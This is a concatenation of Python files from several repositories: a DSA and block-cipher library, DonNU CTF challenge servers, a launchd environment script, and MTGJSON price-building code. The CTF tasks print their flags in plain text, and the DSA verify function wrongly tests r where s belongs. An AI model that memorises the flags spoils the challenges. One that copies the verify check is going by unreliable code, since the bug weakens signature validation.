generateProbablePrimes(N, L, N, hashFunction, forceWeak) p = result[1] q = result[2] domainParameterSeed = base.intToBytes(result[3]) if provablePrimes: domainParameterSeed = domainParameterSeed + base.intToBytes(result[4]) + base.intToBytes(result[5]) if verifiableRoot: index = 1 g = generateVerifiableG(p, q, domainParameterSeed, 1, hashFunction) while g == None and index < 256: index += 1 g = generateVerifiableG(p, q, domainParameterSeed, index, hashFunction) if g == None: return None else: g = generateUnverifiableG(p, q)[0] if g == None: return None return (p, q, g) def generateKeys(p: int, q: int, g: int, useAdditionalBits: bool = False, forceWeak: bool = False) -> tuple: """Generates public and private keys for DSA by algorithms specified in FIPS 186-4, Appendix B.1.1 and B.1.2. This function implements both algorithms. Set useAdditionalBits to True to use algorithm from B.1.1 and to False to use algorithm from B.1.2 Parameters: p: int Bigger prime q: int Smaller prime g: int Primitive root useAdditionalBits: bool Specifies the algorithm to use. True - use FIPS 186-4, Appendix B.1.1 False - use FIPS 186-4, Appendix B.1.2 forceWeak: bool Indicates if p and q should be verified to have approved lengths. False by default Returns: result: tuple Pair of keys: 1. y: int public exponent 2. x: int private exponent """ N = q.bit_length() L = p.bit_length() if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (None, None) if useAdditionalBits: c = secrets.randbits(N + 64) x = (c % (q - 1)) + 1 else: while True: c = secrets.randbits(N) if c <= q - 2: break x = c + 1 y = pow(g, x, p) return (y, x) def generateSecret(p: int, q: int, useAdditionalBits: bool = False, forceWeak: bool = False) -> int: """Generates per-message random secret by algorithms specified in FIPS 186-4, Appendix B.2 Parameters: p: int Bigger prime q: int Smaller prime useAdditionalBits: bool Specifies algorithm to use True - use FIPS 186-4, Appendix B.2.1 False - use FIPS 186-4, Appendix B.2.2 forceWeak: bool Indicates if p and q should be verified to have approved length. False by default Returns: result: int random number appropriate to use for DSA signing with given parameters. May return None if inappropriate parameters were given """ N = q.bit_length() L = p.bit_length() if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return None if useAdditionalBits: c = secrets.randbits(N + 64) k = (c % (q - 1)) + 1 try: pow(k, -1, q) except Exception: return None return k else: while True: c = secrets.randbits(N) if c <= q - 2: break k = c + 1 try: pow(k, -1, q) except Exception: return None return k def prepareMessage( message: bytes, q: int, hashFunction: callable = hashlib.sha256 ) -> int: """Processes the message before signing or verifying according to FIPS 186-4. The procedure works as follows: 1) compute zLength = min(N, outlen), where outlen is the length of hash function. If hash function is not specified, then just take N 2) compute h = Hash(message) if hash function is specified, or jsut message otherwise 3) take zLength leftmost bits of h and return as an integer So the value returned from this function can be directly inserted into signature/verification calculation Parameters: message: bytes Message to process q: int Smaller prime hashFunction: callable hash function to use for message process. Must conform to hashlib protocols. By default hashlib.sha256 is used. This value also might be None, then no hash function will be used Returns: result: int Processed message as integer """ N = q.bit_length() zLength = N if hashFunction != None: outlen = hashFunction().digest_size * 8 zLength = min(N, outlen) message = hashFunction(message).digest() message = base.bytesToInt(message) if message.bit_length() > zLength: message = message >> (message.bit_length() - zLength) return message def sign( message: bytes, p: int, q: int, g: int, x: int, secret: int, hashFunction: callable = hashlib.sha256 ) -> tuple: """Signs message with given private key and secret Parmeters: message: bytes Message to be signed p: int Bigger prime q: int Smaller prime g: int Primitive root x: int Secret exponent secret: int unique random secret for message signature hashFunction: callable hash function for signature. This function must conform to hashlib protocols. By default hashlib.sha256 is used. If this value is None, message bytes will be signed instead of its hash Returns: result: tuple generated signature (r, s) for message """ message = prepareMessage(message, q, hashFunction) r = pow(g, secret, p) % q s = (pow(secret, -1, q) * (message + x * r)) % q if r == 0 or s == 0: return None return (r, s) def verify( message: bytes, p: int, q: int, g: int, r: int, s: int, y: int, hashFunction: callable = hashlib.sha256 ) -> bool: """Verifies given signature Parameters: message: bytes Message which signature is to be checked p: int Bigger prime q: int Smaller prime g: int Primitive root r, s: int Signature to check y: int Public exponent hashFunction: callable signature's hash function. This function must conform to hashlib protocols. By default hashlib.sha256 is used. If this value is None, message bytes will be verified instead of its hash Returns: result: bool True if signature is valid False if signature is invalid """ if r <= 0 or r >= q: return False if s <= 0 or r >= q: return False message = prepareMessage(message, q, hashFunction) w = pow(s, -1, q) u1 = (message * w) % q u2 = (r * w) % q v = ((pow(g, u1, p) * pow(y, u2, p)) % p) % q return v == r ``` #### File: Symmetric/Modes/ ```python from ptCrypt.Symmetric.Modes.Mode import Mode from ptCrypt.Symmetric.BlockCipher import BlockCipher from ptCrypt.Symmetric.Paddings.Padding import Padding class ECB(Mode): """Electronic codebook mode of encryption. The simplest encryption mode. Encrypts every block independently from other blocks. More: """ def __init__(self, cipher: BlockCipher, padding: Padding = None): super().__init__(cipher, padding) def encrypt(self, data: bytes): if self.padding: data = self.padding.pad(data) blocks = self.splitBlocks(data) for i in range(len(blocks)): blocks[i] = self.cipher.encrypt(blocks[i]) return self.joinBlocks(blocks) def decrypt(self, data: bytes): if len(data) % self.cipher.blockSize: raise BlockCipher.WrongBlockSizeException(f"Cannot process data. Data size ({len(data)}) is not multiple of the cipher block size ({self.cipher.blockSize}).") blocks = self.splitBlocks(data) for i in range(len(blocks)): blocks[i] = self.cipher.decrypt(blocks[i]) decrypted = self.joinBlocks(blocks) if self.padding: decrypted = self.padding.unpad(decrypted) return decrypted ``` #### File: aCrypt/test/ ```python from ptCrypt.Math.base import pad from ptCrypt.Symmetric.Paddings.ZeroPadding import ZeroPadding from ptCrypt.Symmetric.Paddings.PKCS5Padding import PKCS5Padding def testZeroPadding(): data = b"\x11\x12\x13" padding = ZeroPadding(4) assert padding.pad(data) == b"\x11\x12\x13\x00" assert padding.unpad(padding.unpad(data)) == data def testPKCS5Padding(): data = b"\x11\x22\x33" padding = PKCS5Padding(4) assert padding.pad(data) == b"\x11\x22\x33\x01" assert padding.unpad(padding.pad(data)) == data data = b"\x11\x22\x33\x44" padding = PKCS5Padding(4) assert padding.pad(data) == b"\x11\x22\x33\x44\x04\x04\x04\x04" assert padding.unpad(padding.pad(data)) == data ```
{ "source": "0awawa0/ctf-nc-framework", "score": 2 }
#### File: ctf-nc-framework/src/ ```python from lib.types import IStdin, IStdout def hello(stdin: IStdin, stdout: IStdout): stdout.write("Hello!\n") ```
{ "source": "0awawa0/DonNU_CTF", "score": 4 }
#### File: Coding/coding3/ ```python import random from lib.types import IStdin, IStdout def hamming_distance(a, b): counter = 0 for i in str(bin(a ^ b)): if i == '1': counter += 1 return counter def main(stdin: IStdin, stdout: IStdout): stdout.write("To get the flag you will need to calculate the Hamming distance of two numbers 100 times.\n") stdout.write("Hamming distance is number of bits at which two numbers differ.\n") stdout.write("Example: for 3 (011) and 5 (101) Hamming distance equals 2\n") for i in range(100): x, y = random.randint(1, 2 ** 32), random.randint(1, 2 ** 32) stdout.write(f"Round {i + 1}: {x} {y}\n") stdout.write("Answer >> ") stdout.flush() try: answer = int(stdin.readline().strip()) if answer != hamming_distance(x, y): stdout.write("Wrooong\n") return None except Exception: stdout.write("You must answer with a single number\n") return None stdout.write("Congratulations! Your flag is donnuCTF{x0r_15_th3_answer}\n") ``` #### File: Forensic/forensic4/ ```python CTF 2021/Forensic/forensic4/ from PIL import Image def toBin(arr): res = "" for b in arr: res += f"{bin(b)[2:]:>08s}" return res def lsb_hide(img, data): pixels = img.load() mask = ~0x01 k = 0 for i in range(img.height): for j in range(img.width): r, g, b = pixels[i, j] g = (g & mask) | (int(data[k % len(data)]) & 0x01) pixels[i, j] = (r, g, b) k += 1 return pixels archive = open("", "rb").read() image ="forensic4.png") lsb_hide(image, toBin(archive))"forensic4_hid.png") ``` #### File: Training_9/add_round_key/ ```python import random from lib.types import IStdin, IStdout def main(stdin: IStdin, stdout: IStdout): stdout.write("To get the flag you need to add 100 4x4 round key matrices to the 4x4 state matrix\n") stdout.write("Send answers as a 1x16 vectors\n") stdout.write("Initial state:\n") initial_state = [random.randint(1, 50) for _ in range(16)] for i in range(0, 16, 4): stdout.write(f"{initial_state[i]} {initial_state[i + 1]} {initial_state[i + 2]} {initial_state[i + 3]}\n") for k in range(100): stdout.write(f"Round key {k + 1}:\n") round_key = [random.randint(51, 99) for _ in range(16)] for i in range(0, 16, 4): stdout.write(f"{round_key[i]} {round_key[i + 1]} {round_key[i + 2]} {round_key[i + 3]}\n") initial_state = [initial_state[i] ^ round_key[i] for i in range(16)] try: stdout.write("Your array >> ") stdout.flush() answer = stdin.readline().strip() array = [int(i) for i in answer.split(" ")] if array == initial_state: stdout.write("Right\n") else: stdout.write("Wrooong. That's another array\n") return except Exception as exception: print(exception) stdout.write("Wrooong. That doesn't look like numbers -_-\n") return stdout.write("Well done! Here's your flag:" + open("src/ctf_tasks/add_round_key/flag.txt", 'r').read()) stdout.flush() ``` #### File: Training_9/array_to_hex/ ```python from lib.types import IStdin, IStdout import random def main(stdin: IStdin, stdout: IStdout): stdout.write("In this task you will need to convert given array into a single hex string 100 times\n") for i in range(100): a = [random.randint(0, 255) for _ in range(random.randint(10, 100))] stdout.write(f"Array {i + 1}: {' '.join(map(str, a))}\n") stdout.write("Answer >> ") stdout.flush() answer = stdin.readline().strip() if answer != "".join([hex(j)[2:] for j in a]): stdout.write("Wrong!\n") return stdout.write("Flag: donnuCTF{just_h3xlify}\n") ``` #### File: Training_9/filter_the_array/ ```python from lib.types import IStdin, IStdout import random def apply_filters(a): res = [] for i in range(len(a)): if a[i] == 0: res.append(a[i]) if not a[i] % 5: continue if a[i] % 2 and i % 2: continue if not (a[i] % 2) and not (i % 2): continue res.append(a[i]) return res def main(stdin: IStdin, stdout: IStdout): stdout.write("For given array apply the following filters:\n") stdout.write(" - never delete 0\n") stdout.write(" - delete number if it is multiple by 5\n") stdout.write(" - delete number if it is even and is on even position\n") stdout.write(" - delete number if it is odd and is on odd position\n") a = [random.randint(0, 1000) for _ in range(random.randint(10, 100))] a.append(0) random.shuffle(a) stdout.write(f"Array: {' '.join(map(str, a))}\n") stdout.write("Answer >> ") stdout.flush() filtered = apply_filters(a) try: answer = list(map(int, stdin.readline().strip().split(" "))) if filtered != answer: stdout.write(f"Wroong! It was: {filtered}\n") return except Exception: stdout.write("Wrong input.\n") return stdout.write("Good job! Flag: donnuCTF{jus7_r3m0v3_som37thing}\n") ``` #### File: Training_2/Mersenne dancing the twist/ ```python def encrypt(y): y = y ^ y >> 11 y = y ^ y << 7 & 2636928640 y = y ^ y << 15 & 4022730752 y = y ^ y >> 18 return y flag = open("flag", 'rb').read().strip() encrypted = list(map(encrypt, flag)) print(encrypted) # 151130148, 189142078, 184947887, 184947887, 155324581, 4194515, 16908820, 16908806, 172234346, 138416801, 151130230, 134222386, 155324647, 151130228, 155324645, 134222434, 155324647, 134222384, 151130148, 155324597, 138416883, 151130230, 134222434, 151130230, 151130230, 138416883, 151130148, 155324597, 172234280, 134222434, 168040121, 172234280, 151130150, 172234280, 151130228, 138416881, 138416801, 155324645, 134222384, 151130230, 151130230, 189142060 ```
{ "source": "0az/dotfiles", "score": 3 }
#### File: .config/launchd/ ```python from __future__ import print_function import argparse import logging import os import pprint import shlex import string import subprocess import sys from logging import StreamHandler from logging.handlers import SysLogHandler ALPHABET = frozenset(string.ascii_letters) IDENTIFIER_START = ALPHABET | set('_') IDENTIFIER = IDENTIFIER_START | set(string.digits) logger = logging.getLogger() syslog_sock = None if os.path.exists('/var/run/syslog'): syslog_sock = '/var/run/syslog' elif os.path.exists('/dev/log'): syslog_sock = '/dev/log' logger.setLevel(logging.DEBUG) logger.addHandler(StreamHandler(sys.stdout)) if syslog_sock: logger.addHandler(SysLogHandler(syslog_sock)) def validate_name(name): if not name: return False if not name[0] in IDENTIFIER_START: return False if not set(name) <= IDENTIFIER: return False return True def sanitize_name(name): name = name.strip() if not validate_name(name): raise ValueError('Invalid Name') return name def process_value(value): if not value: return '' if value.isspace(): logger.warn( 'Value %s consists solely of spaces - is this a bug?' % repr(value) ) logger.warn( 'Replacing whitespace value %s with empty string' % repr(value) ) return '' orig = value if value[0].isspace(): logger.warn('Stripping leading space in value=%s' % repr(orig)) value = value.lstrip() if value[-1].isspace(): logger.warn('Stripping trailing space in value=%s' % repr(orig)) value = value.rstrip() words = shlex.split(value) if len(words) > 1: logger.warn( 'Value %s splits to multiple arguments, joining' % repr(orig) ) else: value = words[0] result = os.path.expandvars(value) result = os.path.expanduser(result) return result def post_process(name, value): folded = name.upper().lower() if folded == 'PATH': lst = value.split(':') value = ':'.join(os.path.expanduser(elem) for elem in lst) os.environ[name] = value return name, value def process_line(line): if not line.strip() or line.startswith('#'): return None, None tup = line.strip().split('=', 1) if len(tup) < 2: raise ValueError("Missing '=' in line %s" % repr(line)) name, value = tup if not validate_name(name): try: name = sanitize_name() logger.warning( 'Sanitized invalid line: name=%s, value=%s' % (repr(name), repr(value)) ) except ValueError: logger.error( 'Skipping invalid line: name=%s, value=%s' % (repr(name), repr(value)) ) return None, None value = process_value(value) name, value = post_process(name, value) return name, value def main():'Starting setenv script') env = {name: val for name, val in os.environ.items() if name in ('HOME')} os.environ.clear() for name, val in env.items(): os.environ[name] = val s = pprint.pformat(os.environ) logger.debug(s) parser = argparse.ArgumentParser() parser.add_argument('-n', '--dry-run', action='store_true') args = parser.parse_args() directory = os.path.dirname(__file__) or '.' invocation = ['/bin/launchctl', 'setenv'] with open(os.path.join(directory, 'launchd.env')) as f: for line in f: name, value = process_line(line) if not name: continue invocation.append(name) invocation.append(value) level = logging.INFO if args.dry_run else logging.DEBUG for name, value in zip(invocation[2::2], invocation[3::2]): logger.log(level, '%s=%s' % (name, repr(value))) s = pprint.pformat(os.environ) logger.debug(s) if args.dry_run: return 0 return if __name__ == '__main__': sys.exit(main()) ```
{ "source": "0az/mtgjson", "score": 3 }
#### File: mtgjson5/classes/ ```python from typing import List from mtgjson5.utils import to_camel_case class MtgjsonGameFormatsObject: """ MTGJSON Singular Card.GameFormats Object """ paper: bool mtgo: bool arena: bool shandalar: bool dreamcast: bool def __init__(self) -> None: """ Empty initializer """ def to_json(self) -> List[str]: """ Support json.dump() :return: JSON serialized object """ return [ to_camel_case(key) for key, value in self.__dict__.items() if "__" not in key and not callable(value) and value ] ``` #### File: mtgjson5/classes/ ```python from typing import Any, Dict, List, Optional, Set from ..classes.mtgjson_card import MtgjsonCardObject from ..classes.mtgjson_translations import MtgjsonTranslationsObject from ..utils import to_camel_case class MtgjsonSetObject: """ MTGJSON Singular Set Object """ base_set_size: int block: str booster: Optional[Dict[str, Any]] cards: List[MtgjsonCardObject] code: str code_v3: str is_foreign_only: bool is_foil_only: bool is_non_foil_only: bool is_online_only: bool is_partial_preview: bool keyrune_code: str mcm_id: Optional[int] mcm_name: Optional[str] mtgo_code: str name: str parent_code: str release_date: str tcgplayer_group_id: Optional[int] tokens: List[MtgjsonCardObject] total_set_size: int translations: MtgjsonTranslationsObject type: str extra_tokens: List[Dict[str, Any]] search_uri: str __allow_if_falsey = { "cards", "tokens", "is_foil_only", "is_online_only", "base_set_size", "total_set_size", } def __init__(self) -> None: """ Initializer to ensure arrays are pre-loaded """ self.extra_tokens = [] = [] self.tokens = [] def __str__(self) -> str: """ MTGJSON Set as a string for debugging purposes :return MTGJSON Set as a string """ return str(vars(self)) def build_keys_to_skip(self) -> Set[str]: """ Build this object's instance of what keys to skip under certain circumstances :return What keys to skip over """ excluded_keys: Set[str] = { "added_scryfall_tokens", "search_uri", "extra_tokens", } for key, value in self.__dict__.items(): if not value: if key not in self.__allow_if_falsey: excluded_keys.add(key) return excluded_keys def to_json(self) -> Dict[str, Any]: """ Support json.dump() :return: JSON serialized object """ skip_keys = self.build_keys_to_skip() return { to_camel_case(key): value for key, value in self.__dict__.items() if "__" not in key and not callable(value) and key not in skip_keys } ``` #### File: mtgjson5/classes/ ```python from typing import Any, Dict, Optional class MtgjsonTranslationsObject: """ MTGJSON Set.Translations Object """ chinese_simplified: Optional[str] chinese_traditional: Optional[str] french: Optional[str] german: Optional[str] italian: Optional[str] japanese: Optional[str] korean: Optional[str] portuguese_ob_brazil_cb: Optional[str] russian: Optional[str] spanish: Optional[str] def __init__(self, active_dict: Dict[str, str] = None) -> None: """ Initializer, for each language, given the contents """ if not active_dict: return self.chinese_simplified = active_dict.get("Chinese Simplified") self.chinese_traditional = active_dict.get("Chinese Traditional") self.french = active_dict.get("French") self.german = active_dict.get("German") self.italian = active_dict.get("Italian") self.japanese = active_dict.get("Japanese") self.korean = active_dict.get("Korean") self.portuguese_ob_brazil_cb = active_dict.get("Portuguese (Brazil)") self.russian = active_dict.get("Russian") self.spanish = active_dict.get("Spanish") @staticmethod def parse_key(key: str) -> str: """ Custom parsing of translation keys :param key: Key to translate :return: Translated key for JSON """ key = key.replace("ob_", "(").replace("_cb", ")") components = key.split("_") return " ".join(x.title() for x in components) def to_json(self) -> Dict[str, Any]: """ Support json.dump() :return: JSON serialized object """ return { self.parse_key(key): value for key, value in self.__dict__.items() if "__" not in key and not callable(value) } ``` #### File: mtgjson5/compiled_classes/ ```python import re import string from typing import Any, Dict, List, Match, Optional from ..providers.scryfall import ScryfallProvider from ..providers.wizards import WizardsProvider from ..utils import parse_magic_rules_subset, to_camel_case class MtgjsonCardTypesObject: """ MTGJSON CardTypes Object """ class MtgjsonCardTypesInnerObject: """ MTGJSON CardTypes.CardTypesInner Object """ artifact: List[str] conspiracy: List[str] creature: List[str] enchantment: List[str] instant: List[str] land: List[str] phenomenon: List[str] plane: List[str] planeswalker: List[str] scheme: List[str] sorcery: List[str] tribal: List[str] vanguard: List[str] def __init__(self, magic_rules: str) -> None: """ Internal initializer :param magic_rules: Rules for MTG from Wizards """ planar_regex = re.compile(r".*The planar types are (.*)\.") self.artifact = ScryfallProvider().get_catalog_entry("artifact-types") self.conspiracy = [] self.creature = ScryfallProvider().get_catalog_entry("creature-types") self.enchantment = ScryfallProvider().get_catalog_entry("enchantment-types") self.instant = ScryfallProvider().get_catalog_entry("spell-types") = ScryfallProvider().get_catalog_entry("land-types") self.phenomenon = [] self.plane = regex_str_to_list( self.planeswalker = ScryfallProvider().get_catalog_entry( "planeswalker-types" ) self.scheme = [] self.sorcery = self.instant self.tribal = [] = [] def to_json(self) -> Dict[str, Any]: """ Support json.dump() :return: JSON serialized object """ return { to_camel_case(key): value for key, value in self.__dict__.items() if "__" not in key and not callable(value) } types: Dict[str, Dict[str, List[str]]] def __init__(self) -> None: """ Initializer to build up the object """ self.types = {} comp_rules = parse_magic_rules_subset(WizardsProvider().get_magic_rules()) inner_sets = self.MtgjsonCardTypesInnerObject(comp_rules) super_regex = re.compile(r".*The supertypes are (.*)\.") super_types = regex_str_to_list( for key, value in inner_sets.to_json().items(): self.types[key] = {"subTypes": value, "superTypes": super_types} def to_json(self) -> Dict[str, Any]: """ Support json.dump() :return: JSON serialized object """ return { to_camel_case(key): value for key, value in self.types.items() if "__" not in key and not callable(value) } def regex_str_to_list(regex_match: Optional[Match]) -> List[str]: """ Take a regex match object and turn a string in format "a, b, c, ..., and z." into [a,b,c,...,z] :param regex_match: Regex match object :return: List of strings """ if not regex_match: return [] # Get only the sentence with the types card_types =". ")[0] # Split the types by comma card_types_split: List[str] = card_types.split(", ") # If there are only two elements, split by " and " instead if len(card_types_split) == 1: card_types_split = card_types.split(" and ") else: # Replace the last one from "and XYZ" to just "XYZ" card_types_split[-1] = card_types_split[-1].split(" ", 1)[1] for index, value in enumerate(card_types_split): card_types_split[index] = string.capwords(value.split(" (")[0]) return card_types_split ``` #### File: mtgjson/mtgjson5/ ```python import configparser import datetime import json import logging import lzma import pathlib import shutil from typing import Any, Dict import dateutil.relativedelta import git import requests from .consts import CACHE_PATH, OUTPUT_PATH from .providers import ( CardHoarderProvider, CardKingdomProvider, CardMarketProvider, TCGPlayerProvider, ) from .utils import deep_merge_dictionaries LOGGER = logging.getLogger(__name__) def download_prices_archive( gist_repo_name: str, file_name: str, github_repo_local_path: pathlib.Path ) -> Dict[str, Dict[str, float]]: """ Grab the contents from a gist file :param gist_repo_name: Gist repo name :param file_name: File to open from Gist :param github_repo_local_path: Where to checkout the repo to :return: File content """ github_url = f"{gist_repo_name}" if github_repo_local_path.is_dir():"Deleting Old Price Data Repo") shutil.rmtree(github_repo_local_path)"Cloning Price Data Repo") git_sh = git.cmd.Git() git_sh.clone(github_url, github_repo_local_path, depth=1) with as file: return dict(json.load(file)) def upload_prices_archive( config: configparser.ConfigParser, github_repo_local_path: pathlib.Path, content: Any, ) -> None: """ Upload prices archive back to GitHub :param config Config for GitHub :param github_repo_local_path: Local file system file :param content: File content """ if "GitHub" not in config.sections(): LOGGER.warning("GitHub section not established. Skipping upload") return # Config values for GitHub github_username = config.get("GitHub", "username") github_api_token = config.get("GitHub", "api_key") github_file_name = config.get("GitHub", "file_name") github_repo_name = config.get("GitHub", "repo_name") if not ( github_username and github_api_token and github_file_name and github_repo_name ): LOGGER.warning("GitHub key values missing. Skipping upload") return # Compress the file to upload for speed and storage savings with, "w") as file: file.write(json.dumps(content).encode("utf-8")) try: repo = git.Repo(github_repo_local_path) # Update remote to allow pushing repo.git.remote( "set-url", "origin", f"https://{github_username}:{github_api_token}{github_repo_name}.git", ) repo.git.commit("-am", "auto-push") origin = repo.remote() origin.push()"Pushed changes to GitHub repo") except git.GitCommandError: LOGGER.warning("No changes found to GitHub repo, skipping") shutil.rmtree(github_repo_local_path) def prune_prices_archive(content: Dict[str, Any], months: int = 3) -> None: """ Prune entries from the MTGJSON database that are older than `months` old :param content: Dataset to modify :param months: How many months back should we keep (default = 3) """ prune_date_str = ( + dateutil.relativedelta.relativedelta(months=-months) ).strftime("%Y-%m-%d") keys_pruned = 0 def prune_recursive(obj: Dict[str, Any], depth: int = 0) -> None: """ Recursive pruner to pluck out bad dates and empty fields """ nonlocal keys_pruned if depth == 5: for date in list(obj.keys()): if date < prune_date_str: del obj[date] keys_pruned += 1 elif isinstance(obj, dict): for key, value in list(obj.items()): prune_recursive(value, depth + 1) if not value: del obj[key] keys_pruned += 1"Determining keys to prune") prune_recursive(content)"Pruned {keys_pruned} structs") def build_today_prices() -> Dict[str, Any]: """ Get today's prices from upstream sources and combine them together :return: Today's prices (to be merged into archive) """ if not OUTPUT_PATH.joinpath("AllPrintings.json").is_file(): LOGGER.error(f"Unable to build prices. AllPrintings not found in {OUTPUT_PATH}") return {} card_hoarder = _generate_prices(CardHoarderProvider()) tcgplayer = _generate_prices(TCGPlayerProvider()) card_market = _generate_prices(CardMarketProvider()) card_kingdom = _generate_prices(CardKingdomProvider()) final_results = deep_merge_dictionaries( card_hoarder, tcgplayer, card_market, card_kingdom ) return final_results def _generate_prices(provider: Any) -> Dict[str, Any]: """ Generate the prices for a source and prepare them for merging with other entities :param provider: MTGJSON Provider that implements generate_today_price_dict :return Manageable data for MTGJSON prices """ preprocess_prices = provider.generate_today_price_dict( OUTPUT_PATH.joinpath("AllPrintings.json") ) final_prices: Dict[str, Any] = json.loads( json.dumps(preprocess_prices, default=lambda o: o.to_json()) ) return final_prices def get_price_archive_data() -> Dict[str, Dict[str, float]]: """ Download compiled MTGJSON price data :return: MTGJSON price data """ config = TCGPlayerProvider().get_configs() if "GitHub" not in config.sections(): LOGGER.warning("GitHub section not established. Skipping requests") return {} # Config values for GitHub github_repo_name = config.get("GitHub", "repo_name") github_file_name = config.get("GitHub", "file_name") github_local_path = CACHE_PATH.joinpath("GitHub-PricesArchive") if not (github_repo_name and github_file_name and github_local_path): LOGGER.warning("GitHub key values missing. Skipping requests") return {} # Get the current working database"Downloading Price Data Repo") return download_prices_archive( github_repo_name, github_file_name, github_local_path ) def download_old_all_printings() -> None: """ Download the hosted version of AllPrintings from MTGJSON for future consumption """ file_bytes = b"" file_data = requests.get( "", stream=True ) for chunk in file_data.iter_content(chunk_size=1024 * 36): if chunk: file_bytes += chunk OUTPUT_PATH.mkdir(parents=True, exist_ok=True) with OUTPUT_PATH.joinpath("AllPrintings.json").open("w", encoding="utf8") as f: f.write(lzma.decompress(file_bytes).decode()) def build_prices() -> Dict[str, Any]: """ The full build prices operation Prune & Update remote database :return Latest prices """"Prices Build - Building Prices") # We'll need AllPrintings.json to handle this if not OUTPUT_PATH.joinpath("AllPrintings.json").is_file():"AllPrintings not found, attempting to download") download_old_all_printings() # Get today's price database"Building new price data") today_prices = build_today_prices() if not today_prices: LOGGER.warning("Pricing information failed to generate") return {} archive_prices = get_price_archive_data() # Update local copy of database"Merging price data") archive_prices = deep_merge_dictionaries(archive_prices, today_prices) # Prune local copy of database"Pruning price data") prune_prices_archive(archive_prices) # Push changes to remote database"Uploading price data") config = TCGPlayerProvider().get_configs() github_local_path = CACHE_PATH.joinpath("GitHub-PricesArchive") upload_prices_archive(config, github_local_path, archive_prices) # Return the latest prices CACHE_PATH.joinpath("last_price_build_time").touch() return archive_prices def should_build_new_prices() -> bool: """ Determine if prices were built recently enough that there is no reason to build them again :return: Should prices be rebuilt """ cache_file = CACHE_PATH.joinpath("last_price_build_time") if not cache_file.is_file(): return True stat_time = cache_file.stat().st_mtime last_price_build_time = datetime.datetime.fromtimestamp(stat_time) twelve_hours_ago = - datetime.timedelta(hours=12) return twelve_hours_ago > last_price_build_time ``` #### File: mtgjson5/providers/ ```python import abc import configparser import datetime import logging from typing import Any, Dict, Union import requests_cache from ..consts import CACHE_PATH, CONFIG, USE_CACHE LOGGER = logging.getLogger(__name__) class AbstractProvider(abc.ABC): """ Abstract class to indicate what other providers should provide """ class_id: str session_header: Dict[str, str] today_date: str ="%Y-%m-%d") def __init__(self, headers: Dict[str, str]): super().__init__() self.class_id = "" self.session_header = headers self.__install_cache() # Abstract Methods @abc.abstractmethod def _build_http_header(self) -> Dict[str, str]: """ Construct the HTTP authorization header :return: Authorization header """ @abc.abstractmethod def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any: """ Download an object from a service using appropriate authentication protocols :param url: URL to download content from :param params: Options to give to the GET request """ # Class Methods @classmethod def get_class_name(cls) -> str: """ Get the name of the calling class :return: Calling class name """ return cls.__name__ @classmethod def get_class_id(cls) -> str: """ Grab the class ID for hashing purposes :return Class ID """ return cls.class_id @staticmethod def get_configs() -> configparser.ConfigParser: """ Parse the config for this specific setup :return: Parsed config file """ return CONFIG @staticmethod def log_download(response: Any) -> None: """ Log how the URL was acquired :param response: Response from Server """ LOGGER.debug( f"Downloaded {response.url} (Cache = {response.from_cache if USE_CACHE else False})" ) # Private Methods def __install_cache(self) -> None: """ Initiate the MTGJSON cache for requests (Useful for development and re-running often) """ if USE_CACHE: CACHE_PATH.mkdir(exist_ok=True) requests_cache.install_cache( str(CACHE_PATH.joinpath(self.get_class_name())) ) ``` #### File: mtgjson5/providers/ ```python import logging import pathlib from typing import Any, Dict, List, Union from singleton_decorator import singleton from ..classes import MtgjsonPricesObject from ..providers.abstract import AbstractProvider from ..utils import get_all_cards_and_tokens, retryable_session LOGGER = logging.getLogger(__name__) @singleton class CardHoarderProvider(AbstractProvider): """ CardHoarder container """ ch_api_url: str = "{}" def __init__(self) -> None: """ Initializer """ super().__init__(self._build_http_header()) def _build_http_header(self) -> Dict[str, str]: """ Construct the Authorization header for CardHoarder :return: Authorization header """ headers: Dict[str, str] = {} __keys_found: bool config = self.get_configs() if "CardHoarder" not in config.sections(): LOGGER.warning("CardHoarder section not established. Skipping upload") self.__keys_found = False self.ch_api_url = "" return headers if config.get("CardHoarder", "token"): self.__keys_found = True self.ch_api_url = self.ch_api_url.format(config.get("CardHoarder", "token")) else:"CardHoarder keys values missing. Skipping pricing") self.__keys_found = False self.ch_api_url = "" return headers def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any: """ Download content from Scryfall Api calls always return JSON from Scryfall :param url: URL to download from :param params: Options for URL download """ session = retryable_session() session.headers.update(self.session_header) response = session.get(url) self.log_download(response) return response.content.decode() def convert_cardhoarder_to_mtgjson( self, url_to_parse: str, mtgo_to_mtgjson_map: Dict[str, str] ) -> Dict[str, float]: """ Download CardHoarder cards and convert them into a more consumable format for further processing. :param url_to_parse: URL to download CardHoarder cards from :param mtgo_to_mtgjson_map: Mapping for translating incoming data :return: Consumable dictionary """ mtgjson_price_map = {} request_api_response: str = # All Entries from CH, cutting off headers file_rows: List[str] = request_api_response.splitlines()[2:] for file_row in file_rows: card_row = file_row.split("\t") mtgo_id = card_row[0] card_uuid = mtgo_to_mtgjson_map.get(mtgo_id) if not card_uuid: LOGGER.debug(f"CardHoarder {card_row} unable to be mapped, skipping") continue if len(card_row) <= 6: LOGGER.warning(f"CardHoarder entry {card_row} malformed, skipping") continue mtgjson_price_map[card_uuid] = float(card_row[5]) return mtgjson_price_map def generate_today_price_dict( self, all_printings_path: Any ) -> Dict[str, MtgjsonPricesObject]: """ Generate a single-day price structure for MTGO from CardHoarder :return MTGJSON prices single day structure """ if not self.__keys_found: return {} mtgo_to_mtgjson_map = self.get_mtgo_to_mtgjson_map(all_printings_path) normal_cards = self.convert_cardhoarder_to_mtgjson( self.ch_api_url, mtgo_to_mtgjson_map ) foil_cards = self.convert_cardhoarder_to_mtgjson( self.ch_api_url + "/foil", mtgo_to_mtgjson_map ) db_contents: Dict[str, MtgjsonPricesObject] = {} self._construct_for_cards(db_contents, normal_cards, True) self._construct_for_cards(db_contents, foil_cards) return db_contents def _construct_for_cards( self, semi_completed_data: Dict[str, MtgjsonPricesObject], cards: Dict[str, float], is_mtgo_normal: bool = False, ) -> None: """ Construct MTGJSON price output for a single day given a card set :param semi_completed_data: MTGJSON set to update :param cards: Cards to iterate """ for key, value in cards.items(): if key not in semi_completed_data.keys(): semi_completed_data[key] = MtgjsonPricesObject( "mtgo", "cardhoarder", self.today_date, "USD" ) if is_mtgo_normal: semi_completed_data[key].sell_normal = float(value) else: semi_completed_data[key].sell_foil = float(value) @staticmethod def get_mtgo_to_mtgjson_map(all_printings_path: pathlib.Path) -> Dict[str, str]: """ Construct a 